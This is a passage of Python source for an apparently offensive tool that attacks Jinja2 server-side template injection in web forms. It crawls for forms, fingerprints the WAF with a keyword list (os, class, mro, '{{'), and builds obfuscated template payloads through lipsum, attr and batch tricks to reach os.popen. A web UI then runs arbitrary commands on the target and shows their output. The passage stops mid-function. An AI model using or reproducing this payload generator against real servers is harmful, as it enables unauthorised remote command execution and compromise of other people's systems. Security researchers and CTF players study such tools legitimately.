import platform

SHOULD_COLOR = platform.system() != "Windows"


def colored(color, text, bold=False):
    """使用ANSI转义字符对文本上色，在windows下不会上色

    Args:
        color (str): 使用的颜色
        text (str): 要上色的字符串
        bold (bool, optional): 是否加粗. Defaults to False.

    Returns:
        str: 上色后的字符串
    """
    if not SHOULD_COLOR:
        return text
    colors = {
        "red": "31",
        "green": "32",
        "yellow": "33",
        "blue": "34",
        "purple": "35",
        "cyan": "36",
    }
    format_str = "\033[{};{}m{}\033[0m"
    if bold:
        format_str = "\033[1;{};{}m{}\033[0m"
    if color not in colors:
        color = "blue"
    return format_str.format(int(bold), colors[color], text)



import logging
from typing import Union
from .form import parse_forms

from bs4 import BeautifulSoup

logger = logging.getLogger("scan_url")


def parse_urls(html: Union[str, BeautifulSoup]) -> list:
    """从html中解析出所有的链接

    Args:
        html (str|BeautifulSoup): HTML

    Returns:
        List[str]: 所有链接
    """
    if isinstance(html, str):
        bs = BeautifulSoup(html, "html.parser")
    elif isinstance(html, BeautifulSoup):
        bs = html

    return [element.attrs["href"] for element in bs.select("a") if "href" in element]


def yield_form(requester, start_url):
    found = False
    targets = [start_url, ]
    visited = set()
    while targets:
        target_url = targets.pop(0)
        if target_url in visited:
            continue
        visited.add(target_url)

        resp = requester.request(method="GET", url=target_url)
        html = BeautifulSoup(resp.text, "html.parser")
        forms = parse_forms(target_url, html)

        if forms:
            yield target_url, forms
            found = True
        targets += parse_urls(html)
    if not found:
        logger.warning("Exit without finding <form> element")



from collections import namedtuple
import logging
from typing import List, Dict, Any, Union, Callable

from .form import random_fill, fill_form
from .requester import Requester
from .colorize import colored
from .const import *
from .waf_func_gen import WafFuncGen
from .full_payload_gen import FullPayloadGen

logger = logging.getLogger("form_cracker")
Result = namedtuple("Result", "full_payload_gen input_field")


class FormCracker:
    """
    对指定的文档进行攻击
    """
    dangerous_keywords = [
        "config", "self", "os", "class", "mro", "base", "request",
        "attr", "open", "system",
        "[", '"', "'", "_", ".", "+", "{{", "|",
        "0", "1", "2",
    ]
    test_cmd = "echo f3n  j1ng;"
    test_result = "f3n j1ng"

    def __init__(
            self,
            url: str,
            form: Dict[str, Any],
            requester: Requester,
            callback: Union[Callable[[str, Dict], None], None] = None
    ):
        """生成用于攻击form的类

        Args:
            url (str, optional): form所在的url.
            form (dict): 解析后的form元素
            requester (Requester, optional): 用于发出请求的requester，为None时自动构造.
            callback (Union[Callable[[str, Dict], None], None]): callback函数，在完成某些阶段后会调用此函数
        """
        self.url = url
        self.form = form
        self.req = requester
        self.callback: Callable[[str, Dict], None] = callback if callback else (
            lambda x, y: None)
        self.waf_func_gen = WafFuncGen(self.url, self.form, self.req, self.callback)

    def vulunable_inputs(self) -> List[str]:
        """解析出form中有回显的input

        Returns:
            List[str]: 所有有回显的input name
        """
        fill_dict = random_fill(self.form)
        r = self.req.request(
            **fill_form(
                self.url,
                self.form,
                form_inputs=fill_dict))
        assert r is not None
        return [
            k for k, v in fill_dict.items()
            if v in r.text
        ]

    def submit(self, inputs: dict):
        """根据inputs提交form

        Args:
            inputs (dict): 需要提交的input

        Returns:
            requests.Response: 返回的reponse元素
        """
        all_length = sum(len(v) for v in inputs.values())
        if all_length > 2048 and self.form["method"] == "GET":
            logger.warning(
                f"inputs are extremely long (len={all_length}) that the request might fail")

        r = self.req.request(
            **fill_form(self.url, self.form, inputs))

        self.callback(CALLBACK_SUBMIT, {
            "form": self.form,
            "inputs": inputs,
            "response": r,
        })

        return r

    def test_input(self, input_field, payload):
        logger.info(
            f"Input {colored('yellow', repr(input_field))} looks great, testing generated payload.")
        r = self.submit({input_field: payload})
        assert r is not None
        return self.test_result in r.text

    def crack_inputs(self, input_field: str) -> Union[Result, None]:
        """攻击对应的input

        Args:
            input_field (str): 需要攻击的input

        Returns:
            Union[Result, None]: 对应的payload生成函数，以及对应的input
        """
        logger.info(f"Testing {colored('yellow', input_field)}")

        waf_func = self.waf_func_gen.generate(input_field)
        full_payload_gen = FullPayloadGen(waf_func, callback=self.callback)
        payload, will_print = full_payload_gen.generate(
            OS_POPEN_READ, self.test_cmd)
        if payload is None:
            self.callback(CALLBACK_TEST_FORM_INPUT, {
                "ok": False,
            })
            return None

        is_test_success = None  # payload测试成功时为True, 失败时为False, 无法测试为None
        if will_print:
            if self.test_input(input_field, payload):
                logger.info(
                    f"{colored('green', 'Success!')} Now we can generate payloads.")
                is_test_success = True
            else:
                logger.info(
                    f"{colored('yellow', 'Test Payload Failed', bold=True)}! Generated payloads might be useless.")
        else:
            logger.info(
                f"Input {input_field} looks great, but we WON'T SEE the execution result! " +
                "You can try generating payloads anyway.")

        self.callback(CALLBACK_TEST_FORM_INPUT, {
            "ok": True,
            "will_print": will_print,
            "test_success": is_test_success,
            "input_field": input_field
        })
        return Result(
            full_payload_gen=full_payload_gen,
            input_field=input_field
        )

    def crack(self) -> Union[Result, None]:
        """攻击表单

        Returns:
            Union[Result, None]: 对应的payload生成函数，以及对应的input
        """
        logger.info(f"Start cracking {self.form}")
        vulunables = self.vulunable_inputs()
        logger.info(
            f"These inputs might be vulunable: {colored('yellow', repr(vulunables))}")

        for input_field in vulunables:
            result = self.crack_inputs(input_field)
            if result:
                return result
        logger.warning(f"Failed...")
        return None



from urllib.parse import urlparse, urlunparse
from typing import Iterable
import random
import logging
import string
from typing import Dict, Any, List, Union

from bs4 import BeautifulSoup

logger = logging.getLogger("utils.form")


def Form(*, action: str, inputs: Iterable, method: str = "POST") -> Dict[str, Any]:
    """根据输入生成一个表单

    Args:
        action (str): action
        inputs (Iterable): 所有input
        method (str, optional): 提交方法. Defaults to "POST".

    Returns:
        Dict[str, Any]: 表单
    """
    method = method.upper()
    if not action.startswith("/"):
        action = "/" + action
    assert method in ["GET", "POST"]
    return {
        "action": action,
        "method": method,
        "inputs": set(inputs)
    }


def parse_forms(url, html: Union[str, BeautifulSoup]) -> List[dict]:
    """从html中解析出对应的表单

    Args:
        url (str): HTML对应的URL
        html (Union[str, BeautifulSoup]): HTML

    Returns:
        List[dict]: 所有表单
    """
    parsed_url = urlparse(url)
    uri = parsed_url.path

    if isinstance(html, str):
        bs = BeautifulSoup(html, "html.parser")
    elif isinstance(html, BeautifulSoup):
        bs = html

    details = []
    for form_element in bs.select("form"):
        form = Form(
            action=form_element.attrs.get("action", uri),
            method=form_element.attrs.get("method", "POST").upper(),
            inputs=[
                element.attrs["name"]
                for element in form_element.select("input")
                if "name" in element.attrs
            ]
        )
        details.append(form)
    return details


def random_fill(form):
    """
    randomli fill the form
    """
    return {
        k: "".join(random.choices(string.ascii_lowercase, k=8))
        for k in form["inputs"]
    }


def fill_form(url, form, form_inputs=None, random_fill_other=True):
    """根据输入填充表单，返回给requests库的参数

    Args:
        url (str): 表单所在的URL
        form (dict): 表单
        form_inputs (dict, optional): input以及对应的值. Defaults to None.
        random_fill_other (bool, optional): 是否随机填充其他input. Defaults to True.

    Returns:
        dict: 给requests的参数
    """
    if random_fill_other:
        fill = random_fill(form)
        if form_inputs is not None:
            fill.update(form_inputs)
    else:
        fill = form_inputs
    return {
        "url": urlunparse(urlparse(url)._replace(path=form["action"])),
        "method": form["method"],
        ("data" if form["method"] == "POST" else "params"): fill
    }



from collections import Counter, namedtuple
from functools import lru_cache
import logging
from typing import List, Dict, Tuple, Callable, Any, Union

from .const import *
from .form import fill_form
from .requester import Requester
from .colorize import colored


logger = logging.getLogger("waf_func_gen")
Result = namedtuple("Result", "payload_generate_func input_field")


class WafFuncGen:
    """
    根据指定的表单生成对应的WAF函数
    """
    dangerous_keywords = [
        "config", "self", "os", "class", "mro", "base", "request",
        "attr", "open", "system",
        "[", '"', "'", "_", ".", "+", "{{", "|",
        "0", "1", "2",
    ]

    def __init__(
            self,
            url: str,
            form: Dict[str, Any],
            requester: Requester,
            callback: Union[Callable[[str, Dict], None], None] = None
    ):
        """根据指定的表单生成对应的WAF函数

        Args:
            url (str, optional): form所在的url. Defaults to None.
            form (dict): 解析后的form元素
            requester (Requester, optional): 用于发出请求的requester，为None时自动构造. Defaults to None.
        """
        self.url = url
        self.form = form
        self.req = requester
        self.callback: Callable[[str, Dict], None] = callback if callback else (
            lambda x, y: None)

    def submit(self, inputs: dict):
        """根据inputs提交form

        Args:
            inputs (dict): 需要提交的input

        Returns:
            requests.Response: 返回的reponse元素
        """
        all_length = sum(len(v) for v in inputs.values())
        if all_length > 2048 and self.form["method"] == "GET":
            logger.warning(
                f"inputs are extremely long (len={all_length}) that the request might fail")
        r = self.req.request(
            **fill_form(self.url, self.form, inputs))

        self.callback(CALLBACK_SUBMIT, {
            "form": self.form,
            "inputs": inputs,
            "response": r,
        })

        return r

    def waf_page_hash(self, input_field: str):
        """使用危险的payload测试对应的input，得到一系列响应后，求出响应中最常见的几个hash

        Args:
            input_field (str): 需要测试的input

        Returns:
            List[int]: payload被waf后页面对应的hash
        """
        resps = {}
        for keyword in self.dangerous_keywords:
            logger.info(
                f"Testing dangerous keyword {colored('yellow', repr(keyword * 3))}")
            resps[keyword] = self.submit({input_field: keyword * 3})
        hashes = [
            hash(r.text) for keyword, r in resps.items()
            if r is not None and r.status_code != 500 and keyword not in r.text
        ]
        return [pair[0] for pair in Counter(hashes).most_common(2)]

    def generate(self, input_field):
        waf_hashes = self.waf_page_hash(input_field)

        @lru_cache(1000)
        def waf_func(value):
            r = self.submit({input_field: value})
            assert r is not None
            return hash(r.text) not in waf_hashes
        return waf_func



from flask import Flask, render_template, request, jsonify

import logging
import threading
import uuid
from urllib.parse import urlparse

from .form import Form
from .form_cracker import FormCracker
from .requester import Requester
from .const import *

logger = logging.getLogger("webui")
app = Flask(__name__)
tasks = {}


class CallBackLogger:
    def __init__(self, flash_messages, messages):
        self.flash_messages = flash_messages
        self.messages = messages

    def callback_prepare_fullpayloadgen(self, data):
        self.messages.append(
            f"已经分析完毕所有上下文payload。"
        )
        if data["context"]:
            context_repr = ', '.join(repr(value)
                                     for value in data['context'].values())
            self.messages.append(
                f"以下是在上下文中的值：{context_repr}"
            )
        else:
            self.messages.append(
                f"没有上下文payload可以通过waf。。。"
            )
        if not data["will_print"]:
            self.messages.append(
                f"生成的payload将不会具有回显。"
            )

    def callback_generate_fullpayload(self, data):
        self.messages.append(
            f"分析完毕，已为类型{data['gen_type']}生成payload {data['payload']}"
        )
        if not data["will_print"]:
            self.messages.append(
                f"payload将不会产生回显"
            )

    def callback_generate_payload(self, data):
        payload_repr = data['payload']
        if len(payload_repr) > 30:
            payload_repr = payload_repr[:30] + "..."
        self.flash_messages.append(
            "请求{req}对应的payload可以是{payload}".format(
                req=f"{data['gen_type']}({', '.join(repr(arg) for arg in data['args'])})",
                payload=payload_repr
            )
        )

    def callback_submit(self, data):
        self.flash_messages.append(
            f"提交表单完成，返回值为{data['response'].status_code}，输入为{data['inputs']}，表单为{data['form']}"
        )

    def callback_test_form_input(self, data):
        if not data["ok"]:
            return
        testsuccess_msg = "payload测试成功！" if data["test_success"] else "payload测试失败。"
        will_print_msg = "其会产生回显。" if data["will_print"] else "其不会产生回显。"
        self.messages.append(
            testsuccess_msg + will_print_msg
        )

    def __call__(self, callback_type, data):
        def default_handler(data): 
            return logger.warning(f"{callback_type=} not found")
        return {
            CALLBACK_PREPARE_FULLPAYLOADGEN: self.callback_prepare_fullpayloadgen,
            CALLBACK_GENERATE_FULLPAYLOAD: self.callback_generate_fullpayload,
            CALLBACK_GENERATE_PAYLOAD: self.callback_generate_payload,
            CALLBACK_SUBMIT: self.callback_submit,
            CALLBACK_TEST_FORM_INPUT: self.callback_test_form_input
        }.get(callback_type, default_handler)(data)


class CrackTaskThread(threading.Thread):
    def __init__(self, taskid, url, form, interval):
        super().__init__()
        self.result = None
        self.taskid = taskid
        self.form = form

        self.flash_messages = []
        self.messages = []
        self.callback = CallBackLogger(self.flash_messages, self.messages)

        self.cracker = FormCracker(
            url=url,
            form=form,
            requester=Requester(
                interval=interval,
                user_agent=DEFAULT_USER_AGENT
            ),
            callback=self.callback
        )

    def run(self):
        self.result = self.cracker.crack()
        if self.result:
            self.messages.append(
                f"WAF已绕过"
            )


class InteractiveTaskThread(threading.Thread):
    def __init__(self, taskid, cracker, field, full_payload_gen, cmd):
        super().__init__()
        self.taskid = taskid
        self.cracker = cracker
        self.field = field
        self.full_payload_gen = full_payload_gen
        self.cmd = cmd

        self.flash_messages = []
        self.messages = []
        self.callback = CallBackLogger(self.flash_messages, self.messages)

        self.cracker.callback = self.callback

    def run(self):
        payload, will_print = self.full_payload_gen.generate(
            OS_POPEN_READ,
            self.cmd
        )
        if not will_print:
            self.messages.append(
                f"此payload不会产生回显"
            )
        r = self.cracker.submit({self.field: payload})
        assert r is not None
        self.messages.append(
            f"提交payload的回显如下："
        )
        self.messages.append(r.text)


@app.route("/")
def index():
    return render_template("index.html")

def create_crack_task(url, method, inputs, action, interval):
    form = Form(
        action=action or urlparse(url).path,
        method=method,
        inputs=inputs.split(",")
    )
    taskid = uuid.uuid4().hex
    task = CrackTaskThread(taskid, url, form, float(interval))
    task.daemon = True
    task.start()
    tasks[taskid] = task
    return taskid

def create_interactive_id(cmd, last_task):
    cracker, field, full_payload_gen = (
        last_task.cracker,
        last_task.result.input_field,
        last_task.result.full_payload_gen
    )
    taskid = uuid.uuid4().hex
    task = InteractiveTaskThread(
        taskid,
        cracker,
        field,
        full_payload_gen,
        cmd
    )
    task.daemon = True
    task.start()
    tasks[taskid] = task
    return taskid


@app.route("/createTask", methods=["POST", ])  # type: ignore
def create_task():
    if request.form.get("type", None) not in ["crack", "interactive"]:
        logging.info(request.form)
        return jsonify({
            "code": APICODE_WRONG_INPUT,
            "message": f"unknown type {request.form.get('type', None)}"
        })
    task_type = request.form.get("type", None)
    if task_type == "crack":
        taskid = create_crack_task(
            request.form["url"],
            request.form["method"],
            request.form["inputs"],
            request.form["action"],
            request.form["interval"],
        )
        return jsonify({
            "code": APICODE_OK,
            "taskid": taskid
        })
    elif task_type == "interactive":
        cmd, last_task_id = (
            request.form["cmd"],
            request.form["last_task_id"],
        )
        if last_task_id not in tasks:
            return jsonify({
                "code": APICODE_WRONG_INPUT,
                "message": f"last_task_id not found: {last_task_id}"
            })
        last_task = tasks[last_task_id]
        if not isinstance(last_task, CrackTaskThread):
            return jsonify({
                "code": APICODE_WRONG_INPUT,
                "message": f"last_task_id not found: {last_task_id}"
            })
        if last_task.result is None:
            return jsonify({
                "code": APICODE_WRONG_INPUT,
                "message": f"specified last_task failed: {last_task_id}"
            })
        taskid = create_interactive_id(cmd, last_task)
        return jsonify({
            "code": APICODE_OK,
            "taskid": taskid
        })


@app.route("/watchTask", methods=["POST", ])  # type: ignore
def watchTask():
    if "taskid" not in request.form:
        return jsonify({
            "code": APICODE_WRONG_INPUT,
            "message": "taskid not provided"
        })
    if request.form["taskid"] not in tasks:
        return jsonify({
            "code": APICODE_WRONG_INPUT,
            "message": f"task not found: {request.form['taskid']}"
        })
    task: CrackTaskThread = tasks[request.form["taskid"]]
    if isinstance(task, CrackTaskThread):
        return jsonify({
            "code": APICODE_OK,
            "taskid": task.taskid,
            "done": not task.is_alive(),
            "messages": task.messages,
            "flash_messages": task.flash_messages,
            "success": task.result.input_field if task.result else None
        })
    elif isinstance(task, InteractiveTaskThread):
        return jsonify({
            "code": APICODE_OK,
            "taskid": task.taskid,
            "done": not task.is_alive(),
            "messages": task.messages,
            "flash_messages": task.flash_messages,
        })


def main():
    app.run(host="127.0.0.1", port=11451)


if __name__ == "__main__":
    main()



from collections import defaultdict
from typing import Callable, DefaultDict, List, Dict, Union, Any
import re
import time
import logging
from .colorize import colored
from .const import *

req_gens: DefaultDict[str, List[Callable]] = defaultdict(list)
used_count = defaultdict(int)
logger = logging.getLogger("payload_gen")


def req_gen(f):
    gen_type = re.match("gen_([a-z_]+)_([a-z0-9]+)", f.__name__)
    if not gen_type:
        raise Exception(
            f"Error found when register payload generator {f.__name__}")
    req_gens[gen_type.group(1)].append(f)


class PayloadGenerator:
    def __init__(
        self,
        waf_func: Callable,
        context: Union[Dict, None],
        callback: Union[Callable[[str, Dict], None], None] = None
    ):
        self.waf_func = waf_func
        self.context = context
        self.cache = {}
        self.generate_funcs = {
            LITERAL: self.literal_generate,
            UNSATISFIED: self.unsatisfied_generate
        }
        self.callback: Callable[[str, Dict], None] = callback if callback else (lambda x, y: None)

    def cache_add(self, gen_type, *args, result=None):
        try:
            # hash() might fail
            if (gen_type, *args) in self.cache:
                return
            self.cache[(gen_type, *args)] = result
        except Exception:
            return

    def cache_has(self, gen_type, *args, result=None):
        try:
            # hash() might fail
            return (gen_type, *args) in self.cache
        except Exception:
            return False

    def count_success(self, gen_type, req_gen_func_name):
        used_count[req_gen_func_name] += 1
        req_gens[gen_type].sort(
            key=(lambda gen_func: used_count[gen_func.__name__]), reverse=True)

    def generate_by_req_list(self, req_list):
        payload = ""
        for gen_type, *args in req_list:
            result = self.generate(gen_type, *args)
            if not result:
                return None
            payload += result
        return payload

    def literal_generate(self, gen_type, *args):
        return args[0] if self.waf_func(args[0]) else None

    def unsatisfied_generate(self, gen_type, *args):
        return None

    def cached_generate(self, gen_type, *args):
        try:
            # hash() might fail
            if (gen_type, *args) not in self.cache:
                return None
            return self.cache[(gen_type, *args)]
        except Exception:
            return None

    def default_generate(self, gen_type: str, *args):

        if self.cache_has(gen_type, *args):
            return self.cached_generate(gen_type, *args)

        if gen_type not in req_gens:
            raise Exception(f"Required type '{gen_type}' not supported.")

        # 遍历当前类型每一个payload生成函数
        for req_gen_func in req_gens[gen_type].copy():
            son_req = req_gen_func(self.context, *args)

            assert isinstance(
                son_req, list), f"Wrong son_req {son_req} from {req_gen_func.__name__}"
            assert all(isinstance(gen_type, str) for gen_type, *
                       args in son_req), f"Wrong son_req {son_req} from {req_gen_func.__name__}"

            payload = self.generate_by_req_list(son_req)
            if not payload:
                continue

            # 生成成功后执行的操作
            self.count_success(gen_type, req_gen_func.__name__)
            self.cache_add(gen_type, *args, result=payload)
            self.callback(CALLBACK_GENERATE_PAYLOAD, {
                "gen_type": gen_type,
                "args": args,
                "payload": payload
            })
            # 为了日志的简洁，仅打印一部分日志
            if gen_type in (INTEGER, STRING) and payload != str(args[0]):
                logger.info("{great}, {gen_type}({args_repl}) can be {payload}".format(
                    great=colored("green", "Great"),
                    gen_type=colored("yellow", gen_type, bold=True),
                    args_repl=colored("yellow", ", ".join(repr(arg)
                                      for arg in args)),
                    payload=colored("blue", payload)
                ))

            elif gen_type in (EVAL_FUNC, EVAL, CONFIG, MODULE_OS, OS_POPEN_OBJ, OS_POPEN_READ):
                logger.info("{great}, we generate {gen_type}({args_repl})".format(
                    great=colored("green", "Great"),
                    gen_type=colored("yellow", gen_type, bold=True),
                    args_repl=colored("yellow", ", ".join(repr(arg)
                                      for arg in args)),
                ))
            return payload
        logger.warning("{failed} generating {gen_type}({args_repl})".format(
            failed=colored("red", "failed"),
            gen_type=gen_type,
            args_repl=", ".join(repr(arg) for arg in args),
        ))
        self.cache_add(gen_type, *args, result=None)
        return None

    def generate(self, gen_type, *args):
        generate_func = self.generate_funcs[gen_type] if gen_type in self.generate_funcs else self.default_generate
        return generate_func(gen_type, *args)


def generate(gen_type, *args, waf_func: Callable, context: Union[dict, None] = None) -> Union[str, None]:
    payload_generator = PayloadGenerator(waf_func, context)
    return payload_generator.generate(gen_type, *args)

# ---

@req_gen
def gen_string_string_concat_plus(context: dict):
    return [
        (LITERAL, "+")
    ]


@req_gen
def gen_string_string_concat_wave(context: dict):
    return [
        (LITERAL, "~")
    ]


# ---

@req_gen
def gen_formular_sum_add(context, num_list):
    return [
        (LITERAL, "({})".format("+".join(str(n) for n in num_list)))
    ]


@req_gen
def gen_formular_sum_addfunc(context, num_list):
    num_list = [
        str(n) if i == 0 else ".__add__({})".format(n)
        for i, n in enumerate(num_list)
    ]
    return [
        (LITERAL, "({})".format(
            "".join(num_list)
        ))
    ]


@req_gen
def gen_formular_sum_attraddfund(context, num_list):
    num_list = [
        str(n) if i == 0 else f"|attr(\"\\x5f\\x5fadd\\x5f\\x5f\")({n})"
        for i, n in enumerate(num_list)
    ]
    return [
        (LITERAL, "({})".format(
            "".join(num_list)
        ))
    ]


@req_gen
def gen_formular_sum_tuplesum(context, num_list):
    if len(num_list) == 1:
        return [
            (LITERAL, str(num_list[0]))
        ]
    payload = "(({})|sum)".format(
        ",".join(num_list)
    )
    return [
        (LITERAL, payload)
    ]

# ---


@req_gen
def gen_zero_literal(context: dict):
    return [
        (LITERAL, "0")
    ]


@req_gen
def gen_zero_2(context: dict):
    return [
        (LITERAL, "({}|int)")
    ]


@req_gen
def gen_zero_3(context: dict):
    return [
        (LITERAL, "(g|urlencode|length)")
    ]


@req_gen
def gen_zero_4(context: dict):
    return [
        (LITERAL, "({}|urlencode|count)")
    ]

# ---


@req_gen
def gen_positive_integer_simple(context: dict, value: int):
    if value < 0:
        return [
            (UNSATISFIED, )
        ]
    return [
        (LITERAL, str(value))
    ]


@req_gen
def gen_positive_integer_sum(context: dict, value: int):
    if value < 0:
        return [
            (UNSATISFIED, )
        ]

    ints = [
        (var_name, var_value) for var_name, var_value in context.items()
        if isinstance(var_value, int) and var_value > 0
    ]

    if ints == []:
        return [
            (UNSATISFIED, )
        ]

    ints.sort(key=lambda pair: pair[1], reverse=True)
    value_left = value
    payload_vars = []
    while value_left != 0:
        while ints and ints[0][1] > value_left:
            ints = ints[1:]
        if not ints:
            return [
                (UNSATISFIED, )
            ]
        value_left -= ints[0][1]
        payload_vars.append(ints[0][0])

    return [
        (FORMULAR_SUM, tuple(payload_vars))
    ]

# ---


@req_gen
def gen_integer_literal(context: dict, value: int):
    return [
        (LITERAL, str(value))
    ]


@req_gen
def gen_integer_context(context: dict, value: int):
    if value not in context.values():
        return [
            (UNSATISFIED, )
        ]
    return [
        (LITERAL, [k for k, v in context.items() if v == value][0])
    ]


@req_gen
def gen_integer_zero(context: dict, value: int):
    if value != 0:
        return [
            (UNSATISFIED, )
        ]
    return [
        (ZERO, )
    ]


@req_gen
def gen_integer_positive(context: dict, value: int):
    if value <= 0:
        return [
            (UNSATISFIED, )
        ]
    return [
        (POSITIVE_INTEGER, value)
    ]


@req_gen
def gen_integer_negative(context: dict, value: int):
    if value >= 0:
        return [
            (UNSATISFIED, )
        ]
    return [
        (LITERAL, "-"),
        (POSITIVE_INTEGER, abs(value))
    ]


# @req_gen
# def gen_integer_unicode(context: dict, value: int):
#     dis = ord("０") - ord("0")
#     return [
#         (LITERAL, "".join(chr(ord(c) + dis) for c in str(value)))
#     ]


@req_gen
def gen_integer_subtract(context: dict, value: int):

    ints = [
        (var_name, var_value) for var_name, var_value in context.items()
        if isinstance(var_value, int) and var_value > 0
    ]

    if ints == []:
        return [
            (UNSATISFIED, )
        ]

    ints.sort(key=lambda pair: pair[1], reverse=True)
    bigger = [pair for pair in ints if pair[1] >= value]
    if not bigger:
        return [
            (UNSATISFIED, )
        ]
    to_sub_name, to_sub_value = min(bigger, key=lambda pair: pair[1])
    ints = [pair for pair in ints if pair[1] <= to_sub_value]
    value_left = to_sub_value - value

    sub_vars = []
    while value_left != 0:
        while ints and ints[0][1] > value_left:
            ints = ints[1:]
        if not ints:
            return [
                (UNSATISFIED, )
            ]
        value_left -= ints[0][1]
        sub_vars.append(ints[0][0])
    return [
        (LITERAL, "({})".format("-".join([to_sub_name, ] + sub_vars)))
    ]


# ---

@req_gen
def gen_string_percent_literal1(context):
    return [
        (LITERAL, "'%'")
    ]


@req_gen
def gen_string_percent_literal2(context):
    return [
        (LITERAL, '"%"')
    ]


@req_gen
def gen_string_percent_context(context):
    if "%" not in context.values():
        return [
            (UNSATISFIED, )
        ]

    return [
        (LITERAL, [k for k, v in context.items() if v == "%"][0])
    ]


@req_gen
def gen_string_percent_urlencode1(context):
    return [
        (LITERAL, "(lipsum()|urlencode|first)")
    ]


@req_gen
def gen_string_percent_urlencode2(context):
    return [
        (LITERAL, "({}|escape|urlencode|first)")
    ]


@req_gen
def gen_string_percent_lipsum(context):
    return [
        (LITERAL, "(lipsum[(lipsum|escape|batch(22)|list|first|last)*2" +
         "+dict(globals=x)|join+(lipsum|escape|batch(22)|list|first|last)*2]" +
         "[(lipsum|escape|batch(22)|list|first|last)*2+dict(builtins=x)" +
         "|join+(lipsum|escape|batch(22)|list|first|last)*2][dict(chr=x)|join](37))")
    ]


@req_gen
def gen_string_percent_lipsumcomplex(context):
    return [
        (LITERAL, "(lipsum[(lipsum|escape|batch("),
        (INTEGER, 22),
        (LITERAL, ")|list|first|last)*"),
        (INTEGER, 2),
        (LITERAL, "+dict(globals=x)|join+(lipsum|escape|batch("),
        (INTEGER, 22),
        (LITERAL, ")|list|first|last)*"),
        (INTEGER, 2),
        (LITERAL, "][(lipsum|escape|batch("),
        (INTEGER, 22),
        (LITERAL, ")|list|first|last)*"),
        (INTEGER, 2),
        (LITERAL, "+dict(builtins=x)|join+(lipsum|escape|batch("),
        (INTEGER, 22),
        (LITERAL, ")|list|first|last)*"),
        (INTEGER, 2),
        (LITERAL, "][dict(chr=x)|join]("),
        (INTEGER, 37),
        (LITERAL, "))"),
    ]

# ---


@req_gen
def gen_string_lower_c_literal1(context):
    return [
        (LITERAL, "'c'")
    ]


@req_gen
def gen_string_lower_c_literal2(context):
    return [
        (LITERAL, '"c"')
    ]


@req_gen
def gen_string_lower_c_joindict(context):
    return [
        (LITERAL, '(dict(c=x)|join)')
    ]


@req_gen
def gen_string_lower_c_lipsumurlencode(context):
    return [
        (LITERAL, "(lipsum|pprint|first|urlencode|last|lower)")
    ]


@req_gen
def gen_string_lower_c_lipsumbatch(context):
    return [
        (LITERAL, "(lipsum|escape|batch("),
        (INTEGER, 8),
        (LITERAL, ")|first|last)")
    ]


@req_gen
def gen_string_lower_c_joinerbatch(context):
    return [
        (LITERAL, "(joiner|string|batch("),
        (INTEGER, 2),
        (LITERAL, ")|first|last)")
    ]

# ---


@req_gen
def gen_string_percent_lower_c_literal1(context):
    return [
        (LITERAL, "'%c'")
    ]


@req_gen
def gen_string_percent_lower_c_literal2(context):
    return [
        (LITERAL, '"%c"')
    ]


@req_gen
def gen_string_percent_lower_c_concat(context):
    return [
        (LITERAL, "("),
        (STRING_PERCENT, ),
        (STRING_STRING_CONCNAT, ),
        (STRING_LOWERC, ),
        (LITERAL, ")"),
    ]


@req_gen
def gen_string_percent_lower_c_cycler(context):
    # cycler|pprint|list|pprint|urlencode|batch(%s)|first|join|batch(%s)|list|last|reverse|join|lower
    return [
        (LITERAL, "(cycler|pprint|list|pprint|urlencode|batch("),
        (INTEGER, 10),
        (LITERAL, ")|first|join|batch("),
        (INTEGER, 8),
        (LITERAL, ")|list|last|reverse|join|lower)")
    ]

# ---


@req_gen
def gen_string_many_percent_lower_c_multiply(context, count: int):
    return [
        (STRING_PERCENT_LOWER_C, ),
        (LITERAL, "*"),
        (INTEGER, count)
    ]


@req_gen
def gen_string_many_percent_lower_c_concat(context, count: int):

    l = [
        [(STRING_PERCENT_LOWER_C, ), ] if i == 0 else [
            (STRING_STRING_CONCNAT, ), (STRING_PERCENT_LOWER_C, ), ]
        for i in range(count)
    ]
    return [item for lst in l for item in lst]


# ---

@req_gen
def gen_string_underline_literal1(context):
    return [
        (LITERAL, "'_'")
    ]


@req_gen
def gen_string_underline_literal2(context):
    return [
        (LITERAL, '"_"')
    ]


@req_gen
def gen_string_underline_context(context: dict):
    if "_" in context.values():
        return [
            (LITERAL, [k for k, v in context.items() if v == "_"][0])
        ]
    return [
        (UNSATISFIED, )
    ]


@req_gen
def gen_string_underline_lipsum(context):
    return [
        (LITERAL, "(lipsum|escape|batch("),
        (INTEGER, 22),
        (LITERAL, ")|list|first|last)")
    ]


@req_gen
def gen_string_underline_tupleselect(context):
    return [
        (LITERAL, "(()|select|string|batch("),
        (INTEGER, 25),
        (LITERAL, ")|first|last)")
    ]


# ---
# 以下的gen_string会互相依赖，但是产生互相依赖时传入的字符串长度会减少所以不会发生无限调用

@req_gen
def gen_string_1(context: dict, value: str):
    chars = [c if c != "\'" else "\\\'" for c in value]
    return [
        (LITERAL, "'{}'".format("".join(chars)))
    ]


@req_gen
def gen_string_2(context: dict, value: str):
    chars = [c if c != "\"" else "\\\"" for c in value]
    return [
        (LITERAL, '"{}"'.format("".join(chars)))
    ]


@req_gen
def gen_string_x1(context: dict, value: str):
    if any(ord(c) >= 128 for c in value):
        return [
            (UNSATISFIED, )
        ]
    target = "".join("\\x" + hex(ord(c))[2:] for c in value)
    return [
        (LITERAL, '"{}"'.format(target))
    ]


@req_gen
def gen_string_x2(context: dict, value: str):
    if any(ord(c) >= 128 for c in value):
        return [
            (UNSATISFIED, )
        ]
    target = "".join("\\x" + hex(ord(c))[2:] for c in value)
    return [
        (LITERAL, "'{}'".format(target))
    ]


@req_gen
def gen_string_u1(context: dict, value: str):
    if any(ord(c) >= 128 for c in value):
        return [
            (UNSATISFIED, )
        ]
    target = "".join("\\u00" + hex(ord(c))[2:] for c in value)
    return [
        (LITERAL, "'{}'".format(target))
    ]


@req_gen
def gen_string_u2(context: dict, value: str):
    if any(ord(c) >= 128 for c in value):
        return [
            (UNSATISFIED, )
        ]
    target = "".join("\\u00" + hex(ord(c))[2:] for c in value)
    return [
        (LITERAL, "'{}'".format(target))
    ]


@req_gen
def gen_string_context(context: dict, value: str):
    if value not in context.values():
        return [
            (UNSATISFIED, )
        ]
    return [
        (LITERAL, [k for k, v in context.items() if v == value][0])
    ]


@req_gen
def gen_string_removedunder(context: dict, value: str):
    if not re.match("^__[A_Za-z0-9_]+__$", value):
        return [
            (UNSATISFIED, )
        ]
    return [
        (STRING_UNDERLINE, ),
        (LITERAL, "*"),
        (INTEGER, 2),
        (STRING_STRING_CONCNAT, ),
        (STRING, value[2:-2]),
